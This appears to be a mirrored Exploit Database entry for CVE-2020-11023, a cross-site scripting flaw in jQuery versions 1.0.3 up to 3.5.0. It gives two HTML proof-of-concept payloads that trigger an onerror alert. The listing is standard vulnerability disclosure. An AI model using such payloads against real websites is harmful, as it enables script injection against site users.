jQuery 1.0.3 – Cross-Site Scripting (XSS)

• Exploit Database
• 18 阅读

• 作者： Central InfoSec
  日期： 2021-04-14
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49767/

• # Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
  # Date: 04/29/2020
  # Exploit Author: Central InfoSec
  # Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
  # CVE : CVE-2020-11023
  
  # Proof of Concept 1:
  <style><style /><img src=x onerror=alert(1)>
  
  # Proof of Concept 2 (Only jQuery 3.x affected):
  <img alt="<x" title="/><img src=x onerror=alert(1)>">